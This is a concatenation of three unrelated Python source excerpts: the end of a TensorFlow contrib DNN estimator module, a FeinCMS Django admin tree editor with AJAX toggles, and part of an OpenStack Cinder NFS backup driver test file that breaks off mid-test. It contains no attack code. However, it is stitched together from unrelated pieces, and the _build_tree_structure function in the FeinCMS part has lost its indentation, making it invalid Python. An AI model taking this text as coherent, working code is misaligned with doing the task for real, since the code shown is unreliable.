  def get_variable_names(self):
    """Returns list of all variable names in this model.

    Returns:
      List of names.
    """
    return self._estimator.get_variable_names()

  def get_variable_value(self, name):
    """Returns value of the variable given by name.

    Args:
      name: string, name of the tensor.

    Returns:
      `Tensor` object.
    """
    return self._estimator.get_variable_value(name)

  def export(self,
             export_dir,
             input_fn=None,
             input_feature_key=None,
             use_deprecated_input_fn=True,
             signature_fn=None,
             default_batch_size=1,
             exports_to_keep=None):
    """See BaseEstimator.export."""
    # Default: parse tf.Examples with this model's feature columns.
    def default_input_fn(unused_estimator, examples):
      return layers.parse_feature_columns_from_examples(
          examples, self._feature_columns)
    return self._estimator.export(
        export_dir=export_dir,
        input_fn=input_fn or default_input_fn,
        input_feature_key=input_feature_key,
        use_deprecated_input_fn=use_deprecated_input_fn,
        signature_fn=(
            signature_fn or export.classification_signature_fn_with_prob),
        prediction_key=prediction_key.PredictionKey.PROBABILITIES,
        default_batch_size=default_batch_size,
        exports_to_keep=exports_to_keep)

  @experimental
  def export_savedmodel(self,
                        export_dir_base,
                        input_fn,
                        default_output_alternative_key=None,
                        assets_extra=None,
                        as_text=False,
                        exports_to_keep=None):
    # Straight delegation to the underlying Estimator.
    return self._estimator.export_savedmodel(
        export_dir_base,
        input_fn,
        default_output_alternative_key=default_output_alternative_key,
        assets_extra=assets_extra,
        as_text=as_text,
        exports_to_keep=exports_to_keep)

  @property
  def model_dir(self):
    return self._estimator.model_dir

  @property
  @deprecated("2016-10-30",
              "This method will be removed after the deprecation date. "
              "To inspect variables, use get_variable_names() and "
              "get_variable_value().")
  def weights_(self):
    # Variable names follow the scopes created in _dnn_model_fn
    # ("dnn/hiddenlayer_<i>" and "dnn/logits").
    hiddenlayer_weights = [
        self.get_variable_value("dnn/hiddenlayer_%d/weights" % i)
        for i, _ in enumerate(self._hidden_units)
    ]
    logits_weights = [self.get_variable_value("dnn/logits/weights")]
    return hiddenlayer_weights + logits_weights

  @property
  @deprecated("2016-10-30",
              "This method will be removed after the deprecation date. "
              "To inspect variables, use get_variable_names() and "
              "get_variable_value().")
  def bias_(self):
    hiddenlayer_bias = [
        self.get_variable_value("dnn/hiddenlayer_%d/biases" % i)
        for i, _ in enumerate(self._hidden_units)
    ]
    logits_bias = [self.get_variable_value("dnn/logits/biases")]
    # The centered-bias variable only exists when enabled at construction.
    if self._enable_centered_bias:
      centered_bias = [self.get_variable_value(_CENTERED_BIAS_WEIGHT)]
    else:
      centered_bias = []
    return hiddenlayer_bias + logits_bias + centered_bias

  @property
  def config(self):
    return self._estimator.config
class DNNRegressor(evaluable.Evaluable, trainable.Trainable):
  """A regressor for TensorFlow DNN models.

  Thin wrapper around a generic `Estimator` configured with `_dnn_model_fn`
  and a regression head.

  Example:

  ```python
  sparse_feature_a = sparse_column_with_hash_bucket(...)
  sparse_feature_b = sparse_column_with_hash_bucket(...)

  sparse_feature_a_emb = embedding_column(sparse_id_column=sparse_feature_a,
                                          ...)
  sparse_feature_b_emb = embedding_column(sparse_id_column=sparse_feature_b,
                                          ...)

  estimator = DNNRegressor(
      feature_columns=[sparse_feature_a, sparse_feature_b],
      hidden_units=[1024, 512, 256])

  # Or estimator using the ProximalAdagradOptimizer optimizer with
  # regularization.
  estimator = DNNRegressor(
      feature_columns=[sparse_feature_a, sparse_feature_b],
      hidden_units=[1024, 512, 256],
      optimizer=tf.train.ProximalAdagradOptimizer(
        learning_rate=0.1,
        l1_regularization_strength=0.001
      ))

  # Input builders
  def input_fn_train: # returns x, y
    pass
  estimator.fit(input_fn=input_fn_train)

  def input_fn_eval: # returns x, y
    pass
  estimator.evaluate(input_fn=input_fn_eval)
  estimator.predict(x=x)
  ```

  Input of `fit` and `evaluate` should have following features,
  otherwise there will be a `KeyError`:

  * if `weight_column_name` is not `None`, a feature with
    `key=weight_column_name` whose value is a `Tensor`.
  * for each `column` in `feature_columns`:
    - if `column` is a `SparseColumn`, a feature with `key=column.name`
      whose `value` is a `SparseTensor`.
    - if `column` is a `WeightedSparseColumn`, two features: the first with
      `key` the id column name, the second with `key` the weight column name.
      Both features' `value` must be a `SparseTensor`.
    - if `column` is a `RealValuedColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`.
  """

  def __init__(self,
               hidden_units,
               feature_columns,
               model_dir=None,
               weight_column_name=None,
               optimizer=None,
               activation_fn=nn.relu,
               dropout=None,
               gradient_clip_norm=None,
               enable_centered_bias=False,
               config=None,
               feature_engineering_fn=None,
               label_dimension=1,
               embedding_lr_multipliers=None):
    """Initializes a `DNNRegressor` instance.

    Args:
      hidden_units: List of hidden units per layer. All layers are fully
        connected. Ex. `[64, 32]` means first layer has 64 nodes and second one
        has 32.
      feature_columns: An iterable containing all the feature columns used by
        the model. All items in the set should be instances of classes derived
        from `FeatureColumn`.
      model_dir: Directory to save model parameters, graph and etc. This can
        also be used to load checkpoints from the directory into a estimator to
        continue training a previously saved model.
      weight_column_name: A string defining feature column name representing
        weights. It is used to down weight or boost examples during training. It
        will be multiplied by the loss of the example.
      optimizer: An instance of `tf.Optimizer` used to train the model. If
        `None`, will use an Adagrad optimizer.
      activation_fn: Activation function applied to each layer. If `None`, will
        use `tf.nn.relu`.
      dropout: When not `None`, the probability we will drop out a given
        coordinate.
      gradient_clip_norm: A `float` > 0. If provided, gradients are clipped
        to their global norm with this clipping ratio. See
        `tf.clip_by_global_norm` for more details.
      enable_centered_bias: A bool. If True, estimator will learn a centered
        bias variable for each class. Rest of the model structure learns the
        residual after centered bias.
      config: `RunConfig` object to configure the runtime settings.
      feature_engineering_fn: Feature engineering function. Takes features and
        labels which are the output of `input_fn` and
        returns features and labels which will be fed
        into the model.
      label_dimension: Dimension of the label for multilabels. Defaults to 1.
      embedding_lr_multipliers: Optional. A dictionary from `EmbeddingColumn` to
        a `float` multiplier. Multiplier will be used to multiply with
        learning rate for the embedding variables.

    Returns:
      A `DNNRegressor` estimator.
    """
    # Kept for the default export input_fn below.
    self._feature_columns = feature_columns
    # All training/eval/predict work is delegated to a generic Estimator
    # running _dnn_model_fn with a regression head.
    self._estimator = estimator.Estimator(
        model_fn=_dnn_model_fn,
        model_dir=model_dir,
        config=config,
        params={
            "head": head_lib._regression_head(  # pylint: disable=protected-access
                label_dimension=label_dimension,
                weight_column_name=weight_column_name,
                enable_centered_bias=enable_centered_bias),
            "hidden_units": hidden_units,
            "feature_columns": feature_columns,
            "optimizer": optimizer,
            "activation_fn": activation_fn,
            "dropout": dropout,
            "gradient_clip_norm": gradient_clip_norm,
            "embedding_lr_multipliers": embedding_lr_multipliers,
        },
        feature_engineering_fn=feature_engineering_fn)

  def fit(self, x=None, y=None, input_fn=None, steps=None, batch_size=None,
          monitors=None, max_steps=None):
    """See trainable.Trainable."""
    # TODO(roumposg): Remove when deprecated monitors are removed.
    hooks = monitor_lib.replace_monitors_with_hooks(monitors, self)
    self._estimator.fit(x=x,
                        y=y,
                        input_fn=input_fn,
                        steps=steps,
                        batch_size=batch_size,
                        monitors=hooks,
                        max_steps=max_steps)
    # Return self so calls can be chained.
    return self

  def evaluate(self, x=None, y=None, input_fn=None, feed_fn=None,
               batch_size=None, steps=None, metrics=None, name=None,
               checkpoint_path=None):
    """See evaluable.Evaluable."""
    # TODO(zakaria): remove once deprecation is finished (b/31229024)
    # Legacy metrics keyed by a plain string are re-keyed to apply to the
    # SCORES prediction; MetricSpec and tuple keys pass through unchanged.
    custom_metrics = {}
    if metrics:
      for key, metric in six.iteritems(metrics):
        if (not isinstance(metric, metric_spec.MetricSpec) and
            not isinstance(key, tuple)):
          custom_metrics[(key, prediction_key.PredictionKey.SCORES)] = metric
        else:
          custom_metrics[key] = metric
    return self._estimator.evaluate(
        x=x, y=y, input_fn=input_fn, feed_fn=feed_fn, batch_size=batch_size,
        steps=steps, metrics=custom_metrics, name=name,
        checkpoint_path=checkpoint_path)

  @deprecated_arg_values(
      estimator.AS_ITERABLE_DATE, estimator.AS_ITERABLE_INSTRUCTIONS,
      as_iterable=False)
  def predict(self, x=None, input_fn=None, batch_size=None, as_iterable=True):
    """Returns predicted scores for given features.

    Args:
      x: features.
      input_fn: Input function. If set, x must be None.
      batch_size: Override default batch size.
      as_iterable: If True, return an iterable which keeps yielding predictions
        for each example until inputs are exhausted. Note: The inputs must
        terminate if you want the iterable to terminate (e.g. be sure to pass
        num_epochs=1 if you are using something like read_batch_features).

    Returns:
      Numpy array of predicted scores (or an iterable of predicted scores if
      as_iterable is True). If `label_dimension == 1`, the shape of the output
      is `[batch_size]`, otherwise the shape is `[batch_size, label_dimension]`.
    """
    key = prediction_key.PredictionKey.SCORES
    preds = self._estimator.predict(x=x, input_fn=input_fn,
                                    batch_size=batch_size, outputs=[key],
                                    as_iterable=as_iterable)
    if as_iterable:
      # Lazily strip the per-example prediction dict down to the score.
      return (pred[key] for pred in preds)
    return preds[key]

  def _get_predict_ops(self, features):
    """See `Estimator` class."""
    # This method exists to support some models that use the legacy interface.
    # pylint: disable=protected-access
    return self._estimator._get_predict_ops(features)

  def get_variable_names(self):
    """Returns list of all variable names in this model.

    Returns:
      List of names.
    """
    return self._estimator.get_variable_names()

  def get_variable_value(self, name):
    """Returns value of the variable given by name.

    Args:
      name: string, name of the tensor.

    Returns:
      `Tensor` object.
    """
    return self._estimator.get_variable_value(name)

  def export(self,
             export_dir,
             input_fn=None,
             input_feature_key=None,
             use_deprecated_input_fn=True,
             signature_fn=None,
             default_batch_size=1,
             exports_to_keep=None):
    """See BaseEstimator.export."""
    # Default: parse tf.Examples with this model's feature columns.
    def default_input_fn(unused_estimator, examples):
      return layers.parse_feature_columns_from_examples(
          examples, self._feature_columns)
    return self._estimator.export(
        export_dir=export_dir,
        input_fn=input_fn or default_input_fn,
        input_feature_key=input_feature_key,
        use_deprecated_input_fn=use_deprecated_input_fn,
        signature_fn=signature_fn or export.regression_signature_fn,
        prediction_key=prediction_key.PredictionKey.SCORES,
        default_batch_size=default_batch_size,
        exports_to_keep=exports_to_keep)

  @property
  def model_dir(self):
    return self._estimator.model_dir

  @property
  def config(self):
    return self._estimator.config
| |
from django.conf import settings as django_settings
from django.contrib import admin
from django.contrib.admin.views import main
from django.db.models import Q
from django.db.models.query import QuerySet
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound, HttpResponseServerError
from django.utils import simplejson
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from mptt.exceptions import InvalidMove
from feincms import settings
import logging
# ------------------------------------------------------------------------
def django_boolean_icon(field_val, alt_text=None, title=None):
    """
    Return HTML code for a nice representation of true/false.
    """
    # Icon naming follows contrib/admin/templatetags/admin_list.py
    icon = {True: 'yes', False: 'no', None: 'unknown'}[field_val]
    if not alt_text:
        alt_text = icon
    title_attr = 'title="%s" ' % title if title is not None else ''
    return mark_safe(u'<img src="%simg/admin/icon-%s.gif" alt="%s" %s/>' %
        (django_settings.ADMIN_MEDIA_PREFIX, icon, alt_text, title_attr))
def _build_tree_structure(cls):
"""
Build an in-memory representation of the item tree, trying to keep
database accesses down to a minimum. The returned dictionary looks like
this (as json dump):
{"6": [7, 8, 10]
"7": [12],
"8": [],
...
}
"""
all_nodes = { }
for p_id, parent_id in cls.objects.order_by(cls._meta.tree_id_attr, cls._meta.left_attr).values_list("pk", "%s_id" % cls._meta.parent_attr):
all_nodes[p_id] = []
if parent_id:
if not all_nodes.has_key(parent_id):
# This happens very rarely, but protect against parents that
# we have yet to iteratove over.
all_nodes[parent_id] = []
all_nodes[parent_id].append(p_id)
return all_nodes
# ------------------------------------------------------------------------
def ajax_editable_boolean_cell(item, attr, text='', override=None):
    """
    Generate a html snippet for showing a boolean value on the admin page.

    Item is an object, attr is the attribute name we should display. Text
    is an optional explanatory text to be included in the output.

    Without an override value, the snippet is a checkbox reflecting
    ``getattr(item, attr)``, wired to an AJAX toggle handler. With an
    override, a static yes/no icon is rendered instead (no interaction).
    """
    if text:
        text = ' (%s)' % unicode(text)

    if override is not None:
        # Static, non-interactive representation.
        parts = [django_boolean_icon(override, text), text]
    else:
        checked = getattr(item, attr)
        parts = [
            '<input type="checkbox"',
            ' checked="checked"' if checked else '',
            ' onclick="return inplace_toggle_boolean(%d, \'%s\')";' % (item.id, attr),
            ' />',
            text,
        ]

    # Wrapper div is what the AJAX response replaces on toggle.
    parts.insert(0, '<div id="wrap_%s_%d">' % (attr, item.id))
    parts.append('</div>')
    return unicode(''.join(parts))
# ------------------------------------------------------------------------
def ajax_editable_boolean(attr, short_description):
    """
    Convenience function: Assign the return value of this method to a variable
    of your ModelAdmin class and put the variable name into list_display.

    Example::
        class MyTreeEditor(TreeEditor):
            list_display = ('__unicode__', 'active_toggle')
            active_toggle = ajax_editable_boolean('active', _('is active'))
    """
    def toggle_column(self, item):
        return ajax_editable_boolean_cell(item, attr)

    # Attributes consumed by the admin changelist / _collect_editable_booleans.
    toggle_column.allow_tags = True
    toggle_column.short_description = short_description
    toggle_column.editable_boolean_field = attr
    return toggle_column
class ChangeList(main.ChangeList):
    """
    Custom ``ChangeList`` class which ensures that the tree entries are always
    ordered in depth-first order (order by ``tree_id``, ``lft``).
    """

    def get_query_set(self):
        # Depth-first ordering: primary sort on the mptt tree id, secondary
        # on the left boundary within each tree.
        return super(ChangeList, self).get_query_set().order_by('tree_id', 'lft')

    def get_results(self, request):
        # Optionally widen the result set to include every ancestor of each
        # matched node, so the rendered tree has no holes. An ancestor is any
        # node in the same tree whose (lft, rght) interval encloses the node's.
        if settings.FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS:
            clauses = [Q(
                tree_id=tree_id,
                lft__lte=lft,
                rght__gte=rght,
            ) for lft, rght, tree_id in \
                self.query_set.values_list('lft', 'rght', 'tree_id')]
            if clauses:
                # OR all clauses together (builtin reduce; file is Python 2).
                self.query_set = self.model._default_manager.filter(reduce(lambda p, q: p|q, clauses))
        return super(ChangeList, self).get_results(request)
# ------------------------------------------------------------------------
# MARK: -
# ------------------------------------------------------------------------
class TreeEditor(admin.ModelAdmin):
    """
    The ``TreeEditor`` modifies the standard Django administration change list
    to a drag-drop enabled interface for django-mptt_-managed Django models.

    .. _django-mptt: http://github.com/mptt/django-mptt/
    """

    if settings.FEINCMS_TREE_EDITOR_INCLUDE_ANCESTORS:
        # Make sure that no pagination is displayed. Slicing is disabled anyway,
        # therefore this value does not have an influence on the queryset
        list_per_page = 999999999

    def __init__(self, *args, **kwargs):
        super(TreeEditor, self).__init__(*args, **kwargs)

        # Make the indented tree title the (linked) first data column,
        # keeping the action checkbox in front when present.
        self.list_display = list(self.list_display)
        if 'indented_short_title' not in self.list_display:
            if self.list_display[0] == 'action_checkbox':
                self.list_display[1] = 'indented_short_title'
            else:
                self.list_display[0] = 'indented_short_title'
        self.list_display_links = ('indented_short_title',)

        # Template lookup, most specific (app/model) first.
        opts = self.model._meta
        self.change_list_template = [
            'admin/feincms/%s/%s/tree_editor.html' % (opts.app_label, opts.object_name.lower()),
            'admin/feincms/%s/tree_editor.html' % opts.app_label,
            'admin/feincms/tree_editor.html',
        ]

    def indented_short_title(self, item):
        """
        Generate a short title for a page, indent it depending on
        the page's depth in the hierarchy.
        """
        # The page_marker span provides the per-level indentation
        # (14px base + 18px per tree level) used by the drag-drop JS.
        if hasattr(item, 'get_absolute_url'):
            r = '''<input type="hidden" class="medialibrary_file_path" value="%s" /><span id="page_marker-%d"
                class="page_marker" style="width: %dpx;">&nbsp;</span>&nbsp;''' % (
                item.get_absolute_url(), item.id, 14+item.level*18)
        else:
            r = '''<span id="page_marker-%d"
                class="page_marker" style="width: %dpx;">&nbsp;</span>&nbsp;''' % (
                item.id, 14+item.level*18)
#        r += '<span tabindex="0">'
        if hasattr(item, 'short_title'):
            r += item.short_title()
        else:
            r += unicode(item)
#        r += '</span>'
        return mark_safe(r)
    indented_short_title.short_description = _('title')
    indented_short_title.allow_tags = True

    def _collect_editable_booleans(self):
        """
        Collect all fields marked as editable booleans. We do not
        want the user to be able to edit arbitrary fields by crafting
        an AJAX request by hand.
        """
        # Cached after the first call.
        if hasattr(self, '_ajax_editable_booleans'):
            return

        self._ajax_editable_booleans = {}

        for field in self.list_display:
            # The ajax_editable_boolean return value has to be assigned
            # to the ModelAdmin class
            item = getattr(self.__class__, field, None)
            if not item:
                continue

            attr = getattr(item, 'editable_boolean_field', None)
            if attr:
                # Default result function: re-render just this one cell.
                def _fn(self, page):
                    return [ ajax_editable_boolean_cell(page, _fn.attr) ]
                _fn.attr = attr
                result_func = getattr(item, 'editable_boolean_result', _fn)
                self._ajax_editable_booleans[attr] = result_func

    def _refresh_changelist_caches(self):
        """
        Refresh information used to show the changelist tree structure such as
        inherited active/inactive states etc.

        XXX: This is somewhat hacky, but since it's an internal method, so be it.
        """
        pass

    def _toggle_boolean(self, request):
        """
        Handle an AJAX toggle_boolean request
        """
        try:
            item_id = int(request.POST.get('item_id', None))
            attr = str(request.POST.get('attr', None))
        except:
            return HttpResponseBadRequest("Malformed request")

        if not request.user.is_staff:
            logging.warning("Denied AJAX request by non-staff %s to toggle boolean %s for page #%s", request.user, attr, item_id)
            return HttpResponseForbidden("You do not have permission to access this page")

        # Only attributes registered via ajax_editable_boolean may be toggled.
        self._collect_editable_booleans()

        if not self._ajax_editable_booleans.has_key(attr):  # Py2-only has_key
            return HttpResponseBadRequest("not a valid attribute %s" % attr)

        try:
            obj = self.model._default_manager.get(pk=item_id)
        except self.model.DoesNotExist:
            return HttpResponseNotFound("Object does not exist")

        # Object-level permission hook takes precedence over the model perm.
        can_change = False
        if hasattr(obj, "user_can") and obj.user_can(request.user, change_page=True):
            can_change = True
        else:
            can_change = request.user.has_perm("page.change_page")

        if not can_change:
            logging.warning("Denied AJAX request by %s to toggle boolean %s for page %s", request.user, attr, item_id)
            return HttpResponseForbidden("You do not have permission to access this page")

        logging.info("Processing request by %s to toggle %s on %s", request.user, attr, obj)

        try:
            before_data = self._ajax_editable_booleans[attr](self, obj)

            setattr(obj, attr, not getattr(obj, attr))
            obj.save()
            self._refresh_changelist_caches() # ???: Perhaps better a post_save signal?

            # Construct html snippets to send back to client for status update
            data = self._ajax_editable_booleans[attr](self, obj)
        except Exception, e:
            logging.exception("Unhandled exception while toggling %s on %s", attr, obj)
            return HttpResponseServerError("Unable to toggle %s on %s" % (attr, obj))

        # Weed out unchanged cells to keep the updates small. This assumes
        # that the order a possible get_descendents() returns does not change
        # before and after toggling this attribute. Unlikely, but still...
        d = []
        for a, b in zip(before_data, data):
            if a != b:
                d.append(b)

        return HttpResponse(simplejson.dumps(d), mimetype="application/json")

    def get_changelist(self, request, **kwargs):
        # Use the depth-first-ordered ChangeList defined above.
        return ChangeList

    def changelist_view(self, request, extra_context=None, *args, **kwargs):
        """
        Handle the changelist view, the django view for the model instances
        change list/actions page.
        """
        if 'actions_column' not in self.list_display:
            self.list_display.append('actions_column')

        # handle common AJAX requests
        if request.is_ajax():
            cmd = request.POST.get('__cmd')
            if cmd == 'toggle_boolean':
                return self._toggle_boolean(request)
            elif cmd == 'move_node':
                return self._move_node(request)
            else:
                return HttpResponseBadRequest('Oops. AJAX request not understood.')

        self._refresh_changelist_caches()

        extra_context = extra_context or {}
        extra_context['FEINCMS_ADMIN_MEDIA'] = settings.FEINCMS_ADMIN_MEDIA
        extra_context['FEINCMS_ADMIN_MEDIA_HOTLINKING'] = settings.FEINCMS_ADMIN_MEDIA_HOTLINKING
        # Serialized parent->children map consumed by the drag-drop JS.
        extra_context['tree_structure'] = mark_safe(simplejson.dumps(
                                                    _build_tree_structure(self.model)))

        return super(TreeEditor, self).changelist_view(request, extra_context, *args, **kwargs)

    def _move_node(self, request):
        # AJAX handler: move cut_item relative to pasted_on via django-mptt.
        cut_item = self.model._tree_manager.get(pk=request.POST.get('cut_item'))
        pasted_on = self.model._tree_manager.get(pk=request.POST.get('pasted_on'))
        position = request.POST.get('position')

        if position in ('last-child', 'left'):
            try:
                self.model._tree_manager.move_node(cut_item, pasted_on, position)
            except InvalidMove, e:
                self.message_user(request, unicode(e))
                return HttpResponse('FAIL')

            # Ensure that model save has been run
            # (re-fetch: move_node updates the DB behind the instance's back).
            cut_item = self.model._tree_manager.get(pk=cut_item.pk)
            cut_item.save()

            self.message_user(request, ugettext('%s has been moved to a new position.') %
                cut_item)
            return HttpResponse('OK')

        self.message_user(request, ugettext('Did not understand moving instruction.'))
        return HttpResponse('FAIL')

    def _actions_column(self, page):
        # Hook for subclasses: return a list of HTML snippets per row.
        return []

    def actions_column(self, page):
        return u' '.join(self._actions_column(page))
    actions_column.allow_tags = True
    actions_column.short_description = _('actions')
| |
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for Backup NFS driver.
"""
import bz2
import filecmp
import hashlib
import os
import shutil
import tempfile
import zlib
import mock
from os_brick.remotefs import remotefs as remotefs_brick
from oslo_config import cfg
from cinder.backup.drivers import nfs
from cinder import context
from cinder import db
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder import test
from cinder import utils
CONF = cfg.CONF

# Fixture values describing a fake NFS backup share; no real mount is used.
FAKE_BACKUP_MOUNT_POINT_BASE = '/fake/mount-point-base'
FAKE_HOST = 'fake_host'
FAKE_EXPORT_PATH = 'fake/export/path'
FAKE_BACKUP_SHARE = '%s:/%s' % (FAKE_HOST, FAKE_EXPORT_PATH)
FAKE_BACKUP_PATH = os.path.join(FAKE_BACKUP_MOUNT_POINT_BASE,
                                FAKE_EXPORT_PATH)
# Backup id split into two-character pieces: the driver shards container
# paths as <part1>/<part2>/<full id> (here: de/ad/deadbeef-whatever).
FAKE_BACKUP_ID_PART1 = 'de'
FAKE_BACKUP_ID_PART2 = 'ad'
FAKE_BACKUP_ID_REST = 'beef-whatever'
FAKE_BACKUP_ID = (FAKE_BACKUP_ID_PART1 + FAKE_BACKUP_ID_PART2 +
                  FAKE_BACKUP_ID_REST)
UPDATED_CONTAINER_NAME = os.path.join(FAKE_BACKUP_ID_PART1,
                                      FAKE_BACKUP_ID_PART2,
                                      FAKE_BACKUP_ID)
class BackupNFSShareTestCase(test.TestCase):
    """Tests for NFS backup driver configuration and share mounting."""

    def setUp(self):
        super(BackupNFSShareTestCase, self).setUp()
        self.ctxt = context.get_admin_context()
        # Silence driver logging; these tests only assert behavior.
        self.mock_object(nfs, 'LOG')

    def test_check_configuration_no_backup_share(self):
        """_check_configuration must fail when backup_share is unset."""
        self.override_config('backup_share', None)
        self.mock_object(nfs.NFSBackupDriver, '_init_backup_repo_path',
                         mock.Mock(return_value=FAKE_BACKUP_PATH))
        with mock.patch.object(nfs.NFSBackupDriver, '_check_configuration'):
            driver = nfs.NFSBackupDriver(self.ctxt)
        self.assertRaises(exception.ConfigNotFound,
                          driver._check_configuration)

    def test_init_backup_repo_path(self):
        """_init_backup_repo_path mounts the share, returns its mount point."""
        self.override_config('backup_share', FAKE_BACKUP_SHARE)
        self.override_config('backup_mount_point_base',
                             FAKE_BACKUP_MOUNT_POINT_BASE)
        mock_remotefsclient = mock.Mock()
        mock_remotefsclient.get_mount_point = mock.Mock(
            return_value=FAKE_BACKUP_PATH)
        self.mock_object(nfs.NFSBackupDriver, '_check_configuration')
        self.mock_object(remotefs_brick, 'RemoteFsClient',
                         mock.Mock(return_value=mock_remotefsclient))
        self.mock_object(utils, 'get_root_helper')
        with mock.patch.object(nfs.NFSBackupDriver, '_init_backup_repo_path'):
            driver = nfs.NFSBackupDriver(self.ctxt)
        path = driver._init_backup_repo_path()
        self.assertEqual(FAKE_BACKUP_PATH, path)
        # BUG FIX: the original called utils.get_root_helper.called_once(),
        # which is not a mock assertion method -- it merely creates a child
        # mock and always "passes".  Assert the call count explicitly.
        self.assertEqual(1, utils.get_root_helper.call_count)
        mock_remotefsclient.mount.assert_called_once_with(FAKE_BACKUP_SHARE)
        mock_remotefsclient.get_mount_point.assert_called_once_with(
            FAKE_BACKUP_SHARE)
def fake_md5(arg):
    """Stand-in for hashlib.md5 that always yields a fixed digest."""
    class _FakeHash(object):
        def hexdigest(self):
            return 'fake-md5-sum'
    return _FakeHash()
class BackupNFSSwiftBasedTestCase(test.TestCase):
    """Test Cases for based on Swift tempest backup tests."""

    _DEFAULT_VOLUME_ID = '8d31c3aa-c5fa-467d-8819-8888887225b6'

    def _create_volume_db_entry(self, volume_id=_DEFAULT_VOLUME_ID):
        """Create a minimal volume row for a backup to reference."""
        vol = {'id': volume_id,
               'size': 1,
               'status': 'available'}
        return db.volume_create(self.ctxt, vol)['id']

    def _create_backup_db_entry(self,
                                volume_id=_DEFAULT_VOLUME_ID,
                                container='test-container',
                                backup_id=123,
                                parent_id=None):
        """Create a backup row, creating its volume first if needed."""
        try:
            db.volume_get(self.ctxt, volume_id)
        except exception.NotFound:
            self._create_volume_db_entry(volume_id=volume_id)
        backup = {'id': backup_id,
                  'size': 1,
                  'container': container,
                  'volume_id': volume_id,
                  'parent_id': parent_id,
                  'user_id': 'user-id',
                  'project_id': 'project-id',
                  }
        return db.backup_create(self.ctxt, backup)['id']

    def setUp(self):
        super(BackupNFSSwiftBasedTestCase, self).setUp()
        self.ctxt = context.get_admin_context()
        self.stubs.Set(hashlib, 'md5', fake_md5)
        self.volume_file = tempfile.NamedTemporaryFile()
        self.temp_dir = tempfile.mkdtemp()
        self.addCleanup(self.volume_file.close)
        self.override_config('backup_share', FAKE_BACKUP_SHARE)
        self.override_config('backup_mount_point_base',
                             '/tmp')
        self.override_config('backup_file_size', 52428800)
        mock_remotefsclient = mock.Mock()
        mock_remotefsclient.get_mount_point = mock.Mock(
            return_value=self.temp_dir)
        self.mock_object(remotefs_brick, 'RemoteFsClient',
                         mock.Mock(return_value=mock_remotefsclient))
        # Remove tempdir.
        self.addCleanup(shutil.rmtree, self.temp_dir)
        # 32 KiB of random data acts as the fake volume contents.
        for _i in range(0, 32):
            self.volume_file.write(os.urandom(1024))

    def test_backup_uncompressed(self):
        volume_id = '0adffe69-ce32-4bb0-b5e6-0000002d748d'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='none')
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)

    def test_backup_bz2(self):
        volume_id = '057a035f-2584-4cfd-bf23-000000e39288'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='bz2')
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)

    def test_backup_zlib(self):
        volume_id = '3701a9f8-effd-44b9-bf2e-000000bb99ca'
        self._create_backup_db_entry(volume_id=volume_id)
        self.flags(backup_compression_algorithm='zlib')
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)

    def test_backup_default_container(self):
        volume_id = 'caffdc68-ef65-48af-928d-000000289076'
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=None,
                                     backup_id=FAKE_BACKUP_ID)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, FAKE_BACKUP_ID)
        service.backup(backup, self.volume_file)
        backup = objects.Backup.get_by_id(self.ctxt, FAKE_BACKUP_ID)
        # assertEqual arguments put in (expected, actual) order for
        # consistency with the rest of the file.
        self.assertEqual(UPDATED_CONTAINER_NAME, backup['container'])

    @mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
                '_send_progress_end')
    @mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
                '_send_progress_notification')
    def test_backup_default_container_notify(self, _send_progress,
                                             _send_progress_end):
        volume_id = '170a1081-9fe2-4add-9094-000000b48877'
        self._create_backup_db_entry(volume_id=volume_id,
                                     container=None)
        # If the backup_object_number_per_notification is set to 1,
        # the _send_progress method will be called for sure.
        CONF.set_override("backup_object_number_per_notification", 1)
        CONF.set_override("backup_enable_progress_timer", False)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        self.assertTrue(_send_progress.called)
        self.assertTrue(_send_progress_end.called)
        # If the backup_object_number_per_notification is increased to
        # another value, the _send_progress method will not be called.
        _send_progress.reset_mock()
        _send_progress_end.reset_mock()
        CONF.set_override("backup_object_number_per_notification", 10)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        self.assertFalse(_send_progress.called)
        self.assertTrue(_send_progress_end.called)
        # If the timer is enabled, the _send_progress will be called,
        # since the timer can trigger the progress notification.
        _send_progress.reset_mock()
        _send_progress_end.reset_mock()
        CONF.set_override("backup_object_number_per_notification", 10)
        CONF.set_override("backup_enable_progress_timer", True)
        service = nfs.NFSBackupDriver(self.ctxt)
        self.volume_file.seek(0)
        backup = objects.Backup.get_by_id(self.ctxt, 123)
        service.backup(backup, self.volume_file)
        self.assertTrue(_send_progress.called)
        self.assertTrue(_send_progress_end.called)

    def test_backup_custom_container(self):
        volume_id = '449b8140-85b6-465e-bdf6-0000002b29c4'
        container_name = 'fake99'
